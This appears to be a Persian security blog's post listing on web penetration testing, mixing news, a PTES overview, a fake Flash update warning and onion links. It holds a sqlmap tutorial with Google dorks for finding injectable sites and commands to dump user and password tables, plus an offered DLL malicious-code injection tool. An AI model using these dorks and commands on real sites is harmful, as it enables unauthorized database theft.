- خبر / هک سایت آذری جهرمی
- حملات روز صفر | Zero day
- آلودگی بیش از 500000 قربانی به باج افزار VpnFilter
- حمله هکرهای ایرانی به دانشگاه های سنگاپور
- حمله گسترده سایبری به زیر ساخت اینترنت کشور
- وب سایت های فیشینگ بانکی رصد شده
- باج افزار PUBG
- فرق بین وب سرور و سیستم سرور
- مرورگر اینترنت اکسپلورر، دام جدید هکرها
- اکسپلویت آسیب پذیر در پیام رسان داخلی iGap
آخرین مطالب
امکانات وب
استاندارد اجرای تست نفوذ (PTES)، استانداردی است که در برگیرنده ی همه چیز جهت انجام تست نفوذ هست از ارتباطات اولیه و دلایل انجام تست نفوذ برای یک سازمان تا جمع آوری اطلاعات، مدل سازی تهدیدات، آنالیز آسیب پذیری، اکسپلویتیشن، پست-اکسپلویتیشن و گزارش دهی بوده و از هفت بخش اصلی تشکیل میشه:
Pre-engagement Interactions
Intelligence Gathering
Threat Modeling
Vulnerability Analysis
Exploitation
Post Exploitation
Reporting
[جهت بیشتر دیدن جزییات و مطالعه کامل به سایت زیر بروید]
http://www.pentest-standard.org دوره تست نفوذ وب با باگهای ۲۰۱۷...
ما را در سایت دوره تست نفوذ وب با باگهای ۲۰۱۷ دنبال می کنید
برچسب : نویسنده : 4hijackc بازدید : 101 تاريخ : چهارشنبه 29 آذر 1396 ساعت: 22:19
ابزار تزریق کد مخریب dll" height="1280" width="1271">
ابزاری برای تزریق کد مخرب به فایل های dll
رمز فایل : hijack.blog.ir
ما را در سایت دوره تست نفوذ وب با باگهای ۲۰۱۷ دنبال می کنید
برچسب : نویسنده : 4hijackc بازدید : 109 تاريخ : چهارشنبه 29 آذر 1396 ساعت: 22:19
⛔️تذکر مهم؛ به پیام های در ظاهر به روز رسانی فلش پلیر اعتماد نکنید⛔️
فلش پلیر دانلود شده از لینک:
http://security-alert.[Random].top⚠️
که در حین وبگردی با آن مواجه می شوید آلوده به بدافزار می باشد.
چند نمونه از آدرس های آلوده در زیر نمایش داده شده است.
⚠️http://security-alert[dot]w3vqxza5[dot]top/ccleaner/....
⚠️http://security-alert[dot]3dosyv5z[dot]top/ccleaner/....
⚠️http://security-alert[dot]q9y6np[dot]top/ccleaner/.....
[ لطفا این خبر را اطلاع رسانی کنید ]
توصیه می شود :
در صورت دریافت چنین پیام هایی حتما به وب سایت ادوبی مراجعه کنید و در صورتی که می خواهید فلش پلیر خود را به روز رسانی کنید از طریق سایت های معتبر دانلود اقدام نمایید
✅به پیام های ظاهر شده مبنی بر به روز رسانی فلش پلیر اعتماد نکنید و در صورتی که نرم افزار مشکوکی را دانلود کردید به هیچ عنوان آن را بر روی سیستم خود نصب نکنید.
✅از آنتی ویروس استفاده نموده و حتما بروز رسانی کنید. دوره تست نفوذ وب با باگهای ۲۰۱۷...
ما را در سایت دوره تست نفوذ وب با باگهای ۲۰۱۷ دنبال می کنید
برچسب : نویسنده : 4hijackc بازدید : 100 تاريخ : چهارشنبه 29 آذر 1396 ساعت: 22:19
دوره تست نفوذ وب با باگهای ۲۰۱۷...
ما را در سایت دوره تست نفوذ وب با باگهای ۲۰۱۷ دنبال می کنید
برچسب : نویسنده : 4hijackc بازدید : 248 تاريخ : دوشنبه 27 آذر 1396 ساعت: 6:56
جهت دریافت اسکریپت کلیک کنید
زبان: پایتون
hijack.blog.ir :رمز فایل دوره تست نفوذ وب با باگهای ۲۰۱۷...ما را در سایت دوره تست نفوذ وب با باگهای ۲۰۱۷ دنبال می کنید
برچسب : نویسنده : 4hijackc بازدید : 107 تاريخ : دوشنبه 27 آذر 1396 ساعت: 6:56
دوره تست نفوذ وب با باگهای ۲۰۱۷...ما را در سایت دوره تست نفوذ وب با باگهای ۲۰۱۷ دنبال می کنید
برچسب : نویسنده : 4hijackc بازدید : 111 تاريخ : دوشنبه 27 آذر 1396 ساعت: 6:56
حمله سایبری به بانک پاسارگاد خنثی شد
مدیرعامل بانک پاسارگاد:
در پی حمله سایبری ماه های گذشته به سایت بانک با مرکز هند، چین، آمریکا و...
در سه روز تا ۲ هزار و ۳۰۰ برابر پهنای باند بانک اطلاعات جعلی ارسال شد اما توانمندی جوانان ایرانی برای دفاع، بر این جریان غلبه کرد.
ما را در سایت دوره تست نفوذ وب با باگهای ۲۰۱۷ دنبال می کنید
برچسب : نویسنده : 4hijackc بازدید : 114 تاريخ : دوشنبه 27 آذر 1396 ساعت: 6:56
دسته دیگر از تروجان ها به عنوان FTP Trojan شناخته میشوند که نحوه عملکرد این تروجان بدین شکل است که قادر است پورت 21 را یاز نموده و سیستم هدف را به گونه ای برای هکر قابل دسترس بنماید.
در واقع توسط این تروجان یک FTP Server بر روی سیستم قربانی نصب می گردد و نفوذگر بدین طریق میتواند به اطلاعات حساس دست یابد و نفوذگر قادر است با پروتکل FTP و پورت 21 فایل های مهم را انتقال دهد. دوره تست نفوذ وب با باگهای ۲۰۱۷...ما را در سایت دوره تست نفوذ وب با باگهای ۲۰۱۷ دنبال می کنید
برچسب : نویسنده : 4hijackc بازدید : 114 تاريخ : جمعه 24 آذر 1396 ساعت: 8:14
« Link Dark Web »
http://b6ci4n33iwq12mwy.onion/http://b6ci4n33iwqcpmwy.onion/http://b6kpigzhrdhibmos.onion/http://b6lmqk6ovmfhrm4a.onion/http://b6siqj6jyj5qwb5a.onion/http://b6vgsw65tfihoeq2.onion/http://b77hgnafzdsqhx2p.onion/http://b7cxf4dkdsko6ah2.onion/http://b7w2gy5fn5lenigv.onion/http://babylonxjrtdyomy.onion/http://bah37war75xzkpla.onion/http://balrqba4x57ofa6s.onion/http://bananaweiwj3r7yd.onion/http://bani26jpxcv4sbuy.onion/http://bankmyoarpabtfai.onion/http://bashkdppiyz66dln.onion/http://bazaar7h4ol6a3xu.onion/http://bazaarb6uvyap2lu.onion/http://bazapfh44syfowge.onion/http://bazard3zloiubtyd.onion/http://bazarilzvorlramx.onion/http://bbseyes36k6cowi6.onion/http://bbsqfujyiblsrygu.onion/http://bbtkmm4qvv7mzdey.onion/http://bbufcbekcsnwuazb.onion/http://bbxdfsru7lmmbj32.onion/http://bbzmlkjr7bmquokx.onion/http://bc7cxr6v3arxkffn.onion/http://bcdnxg7j4h6a7mdk.onion/http://bcoseedeu6nkzme7.onion/http://bcuo3m7lb7e6athd.onion/http://bczjr6ciiblco5ti.onion/http://bdf2wcxujkg6qqff.onion/http://bdhk3yzfoizzwtwb.onion/http://bdlbvzqddbcti37i.onion/http://bdpuqvsqmphctrcs.onion/http://be7zs57kh5nkv5kp.onion/http://bea3bhruclv46hjw.onion/http://beast7ruvpc3qjhv.onion/http://bed دوره تست نفوذ وب با باگهای ۲۰۱۷...
ما را در سایت دوره تست نفوذ وب با باگهای ۲۰۱۷ دنبال می کنید
برچسب : نویسنده : 4hijackc بازدید : 185 تاريخ : جمعه 24 آذر 1396 ساعت: 8:14
یک Pentester (هکر اخلاقی یا Ethical Hacker) آسیب پذیری های موجود در سیستم ها، شبکه ها و برنامه های کاربردی را کشف و اکسپلویت می کند.به عبارت دیگر، به شما پول پرداخت می شود تا به صورت قانونی هک کنید.
شما باید از مجموعه ای از ابزار ها استفاده کنید، تعدادی از ابزار های که وجود دارند و تعدادی ابزار که خودتان طراحی کرده اید تا حملات واقعی را شبیه سازی کنید.
هدف نهایی شما آن است که امنیت یک سازمان را ارتقا دهید. بر خلاف هکرهای واقعی، شما مدت محدودی زمان دارید تا به سیستم نفوذ کنید.
از شما انتظار می رود که یافته های خود را مستند کنید.
تست نفوذ یکی از خسته کننده ترین شغل ها در فیلد های امنیت سایبری است.
برخی از وظایف عبارتند از:
ادامه مطلب دوره تست نفوذ وب با باگهای ۲۰۱۷...
ما را در سایت دوره تست نفوذ وب با باگهای ۲۰۱۷ دنبال می کنید
برچسب : نویسنده : 4hijackc بازدید : 127 تاريخ : جمعه 24 آذر 1396 ساعت: 8:14
تصویری از مرکز عملیات امنیت ملی آمریکا (NSOC) که بخشی از آژانس امنیت ملی آمریکا (NSA) میباشد
ما را در سایت دوره تست نفوذ وب با باگهای ۲۰۱۷ دنبال می کنید
برچسب : نویسنده : 4hijackc بازدید : 103 تاريخ : جمعه 24 آذر 1396 ساعت: 8:14
اصطلاح Doxing
به انتشار اطلاعات هویتی به دست آمده راجع به یک فرد از شبکه های اجتماعی عمومی اطلاق می شود.
✍منبع: CEH Slides
ما را در سایت دوره تست نفوذ وب با باگهای ۲۰۱۷ دنبال می کنید
برچسب : نویسنده : 4hijackc بازدید : 97 تاريخ : جمعه 24 آذر 1396 ساعت: 8:14
یک محققامنیتی با نام ZwClose متوجه شد شرکت HP بروی ۴۶۰ مدل لپ تاپ خود ، کیلاگر از پیش نصب شده دارد.
ما را در سایت دوره تست نفوذ وب با باگهای ۲۰۱۷ دنبال می کنید
برچسب : نویسنده : 4hijackc بازدید : 125 تاريخ : چهارشنبه 22 آذر 1396 ساعت: 11:07
دوره تست نفوذ وب با باگهای ۲۰۱۷...ما را در سایت دوره تست نفوذ وب با باگهای ۲۰۱۷ دنبال می کنید
برچسب : نویسنده : 4hijackc بازدید : 112 تاريخ : چهارشنبه 22 آذر 1396 ساعت: 11:07
هکرهای روسی به ۱۵ بانک آمریکایی و ۳ بانکروسی حمله کردند و ۱۰ میلیون دلار از شبکه دستگاههای خودپرداز ربودند.
ما را در سایت دوره تست نفوذ وب با باگهای ۲۰۱۷ دنبال می کنید
برچسب : نویسنده : 4hijackc بازدید : 132 تاريخ : چهارشنبه 22 آذر 1396 ساعت: 11:07
آموزش دامپ دیتابیس سایت ها با باگ Sql Injection با کمک ابذار Sqlmap
در قدم اول یک سایت که دارایی باگ sql داره را پیدا کنید(میتوانید از دورک های زیر استفاده کنید)
inurl:news.php?id=inurl:pages.php?id=inurl:post.php?id=inurl:events.php?id=inurl:details.php?id=inurl:blog.php?id=inurl:show.php?id=
تارگتی که بنده در این آموزش استفاده میکنم
http://testphp.vulnweb.com/listproducts.php?cat=1'
(سپس یک ترمینال را بازکنید(با دستور زیر دیتابیس سایت را بیرون بکشید
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 —dbs
سپس دیتابیس های سایت رو به ما در اخر نشون میده بعدش با دستور زیر جدول های دیتادیس مورد نظر خودمونو بدست میاریم
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D نام دیتابیس —tables
مثلا ما فرض رو به این میگیریم یه تیبل به ما نشون میده و اسمش هم یوزر هستش با دستور زیر ستون های دیتابیس رو بدست میاریم
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D dbname -T users —columns
فرض میکنیم که سه تا ستون زیر رو نشون میده
useamepasswordemail
در نهایت با دستور زیر دیتای ستون هارو بدست میاریم
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D dbname -T users -C useame password email —dump
دیتابیس شما با موفقیت دامپ شد
ومن الله توفیق دوره تست نفوذ وب با باگهای ۲۰۱۷...
ما را در سایت دوره تست نفوذ وب با باگهای ۲۰۱۷ دنبال می کنید
برچسب : دیتابیس, نویسنده : 4hijackc بازدید : 98 تاريخ : دوشنبه 20 آذر 1396 ساعت: 13:54
دوره تست نفوذ وب با باگهای ۲۰۱۷...ما را در سایت دوره تست نفوذ وب با باگهای ۲۰۱۷ دنبال می کنید
برچسب : نویسنده : 4hijackc بازدید : 89 تاريخ : دوشنبه 20 آذر 1396 ساعت: 13:54
جهت دانلود کلیک کنید
351 KB :حجم فایل
hijack.blog.ir :رمز فایل
استفاده نادرست بر عهده خود شخص می باشد و نویسنده وبلاگ هیچ
گونه مسولیتی ندارد دوره تست نفوذ وب با باگهای ۲۰۱۷...ما را در سایت دوره تست نفوذ وب با باگهای ۲۰۱۷ دنبال می کنید
برچسب : نویسنده : 4hijackc بازدید : 97 تاريخ : دوشنبه 20 آذر 1396 ساعت: 13:54
دوره تست نفوذ وب با باگهای ۲۰۱۷...
جهت دریافت آموزش کلیک کنیدما را در سایت دوره تست نفوذ وب با باگهای ۲۰۱۷ دنبال می کنید
برچسب : نویسنده : 4hijackc بازدید : 389 تاريخ : يکشنبه 19 آذر 1396 ساعت: 1:16
دوره تست نفوذ وب با باگهای ۲۰۱۷...
ما را در سایت دوره تست نفوذ وب با باگهای ۲۰۱۷ دنبال می کنید
برچسب : دانشگاهی, نویسنده : 4hijackc بازدید : 136 تاريخ : پنجشنبه 16 آذر 1396 ساعت: 19:07